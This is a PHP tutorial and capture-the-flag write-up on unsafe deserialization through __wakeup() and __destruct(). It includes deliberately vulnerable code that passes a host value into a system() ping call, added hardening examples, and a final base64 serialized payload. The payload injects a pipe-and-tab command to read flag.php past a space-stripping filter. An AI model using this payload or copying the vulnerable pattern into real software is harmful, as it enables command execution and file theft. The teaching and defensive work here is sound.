- Introduction
__wakeup() is a magic method that unserialize() invokes automatically on the reconstructed object, before the call returns. Whatever __wakeup() does therefore runs with attacker-chosen property values if the serialized string came from user input.
```php
<?php
class c1
{
    private $argv;
    private $method;

    function __construct($argv, $method)
    {
        $this->argv = $argv;
        $this->method = $method;
    }

    public function f1()
    {
        echo "f1";
    }

    // Called by unserialize() as soon as the object has been rebuilt.
    function __wakeup()
    {
        $this->f1();
    }
}

$c1 = new c1('123', 'GET');
$b = serialize($c1);
echo $b;

// Demo: the serialized string is taken straight from the query string,
// so the caller controls the properties the object wakes up with.
$str = $_GET['str'];
unserialize($str);
```
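To show the ordering concretely and the standard mitigation, here is an added example (not code from the original write-up) that reuses the `c1` class above. It demonstrates that `__wakeup()` fires inside `unserialize()`, and that the `allowed_classes` option of `unserialize()` (available since PHP 7.0) stops attacker-named classes from being instantiated, so no magic method runs at all:

```php
<?php
// Added example: __wakeup() ordering and the allowed_classes mitigation.
// Same c1 class as in the write-up above.
class c1
{
    private $argv;
    private $method;

    function __construct($argv, $method)
    {
        $this->argv = $argv;
        $this->method = $method;
    }

    public function f1()
    {
        echo "f1 called via __wakeup\n";
    }

    function __wakeup()
    {
        $this->f1();
    }
}

// The serialized string is generated locally here rather than read from a
// request, so the script runs stand-alone.
$payload = serialize(new c1('123', 'GET'));

// 1) Default behaviour: c1 is instantiated and __wakeup() runs before
//    unserialize() returns.
$obj = unserialize($payload);
var_dump($obj instanceof c1);

// 2) Hardened call: no class may be instantiated, so __wakeup() is never
//    reached and the data comes back as a __PHP_Incomplete_Class stub
//    that has no methods.
$safe = unserialize($payload, ['allowed_classes' => false]);
var_dump($safe instanceof __PHP_Incomplete_Class);
var_dump(method_exists($safe, 'f1'));

// 3) Allowlist: only the named classes may be created. c1 is still
//    instantiated here, but any other class name in the payload would
//    also become a __PHP_Incomplete_Class.
$limited = unserialize($payload, ['allowed_classes' => ['c1']]);
var_dump($limited instanceof c1);
```

Run it with `php` on the command line: the "f1 called via __wakeup" line is printed twice (cases 1 and 3) and not at all for case 2, which is the behaviour a defender wants when the serialized data is untrusted.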
2. CTF challenge
index.php (the goal is to read flag.php in the same directory):
```php
<?php
class home {
    private $method;
    private $args;

    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }

    // Runs when the object is destroyed: dispatches to $this->method
    // with $this->args, both of which come from the serialized data.
    function __destruct() {
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }

    // Command-injection sink: $host is interpolated into a shell command.
    function ping($host) {
        system("ping -c 2 $host");
    }

    // "WAF": only removes spaces.
    function waf($str) {
        $str = str_replace(' ', '', $str);
        return $str;
    }

    // Called first by unserialize(): every argument is passed through waf().
    function __wakeup() {
        foreach ($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim(addslashes($v)));
        }
    }
}

$a = @$_GET['a'];
unserialize(base64_decode($a));
```
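The weakness in the challenge is not the missing space filter but the design: an attacker-controlled object graph is deserialized, `__destruct()` dispatches on attacker-controlled state, and the `ping()` sink interpolates a string into a shell command behind a denylist that strips a single character. The following hardened counterpart is an added example, not the challenge's own code; the names `isValidHost`, `safePing` and `handleRequest` are hypothetical. It allowlists the shape of the host, shell-quotes whatever still reaches `system()`, and carries the request as JSON so that no PHP class is instantiated and no magic method runs during decoding:

```php
<?php
// Added example: hardened counterpart to the vulnerable `home` class.
// Hypothetical helper names; none of this is from the challenge itself.

// Strict allowlist: a literal IP address, or a hostname whose labels use
// only the characters DNS allows. Anything else (metacharacters, tabs,
// pipes, quotes) is rejected instead of being "cleaned".
function isValidHost($host)
{
    if (!is_string($host) || $host === '' || strlen($host) > 253) {
        return false;
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return (bool) preg_match('/^(?:' . $label . '\.)*' . $label . '$/', $host);
}

// The only place a shell command is built. The value has already passed
// the allowlist, and it is still quoted so the shell sees one argument.
function safePing($host)
{
    if (!isValidHost($host)) {
        throw new InvalidArgumentException('host rejected by allowlist');
    }
    return system('ping -c 2 ' . escapeshellarg($host));
}

// Request handling without unserialize(): JSON carries plain data only,
// so there is no __wakeup()/__destruct() to trigger, and the action is
// fixed in code rather than read from the request.
function handleRequest($json)
{
    $req = json_decode($json, true);
    if (!is_array($req) || !isset($req['host'])) {
        return 'bad request';
    }
    try {
        return safePing($req['host']);
    } catch (InvalidArgumentException $e) {
        return 'rejected: ' . $e->getMessage();
    }
}

// Constructed inputs for a local run. The second value has the same
// pipe-and-tab shape as the challenge payload (no space, so the original
// waf() would have let it through); the allowlist rejects it outright.
var_dump(isValidHost('127.0.0.1'));
var_dump(isValidHost("127.0.0.1|cat\tsomefile"));
var_dump(isValidHost('example.com'));
echo handleRequest(json_encode(['host' => "127.0.0.1|cat\tsomefile"])), "\n";
```

Note the order of defences: the allowlist does the real work, `escapeshellarg()` is a second layer, and replacing `unserialize()` with `json_decode()` removes the magic-method entry point entirely. If PHP object deserialization cannot be avoided, at minimum pass `['allowed_classes' => ...]` and keep `__destruct()` free of dispatch on object state.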
Solution approach
During unserialize(), __wakeup() is called first and performs the space filtering: $this->waf() replaces every space with the empty string, so no space can survive in the arguments.
First construct the serialized payload, then base64-encode it:
Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czo2NzoiMTI3LjAuMC4xfHR5cGUJRDpccGhwc3R1ZHlfcHJvXFdXV1x3d3cudGVzdDEuY29tXGN0ZlxkZW1vNVxmbGFnLnBocCI7fX0=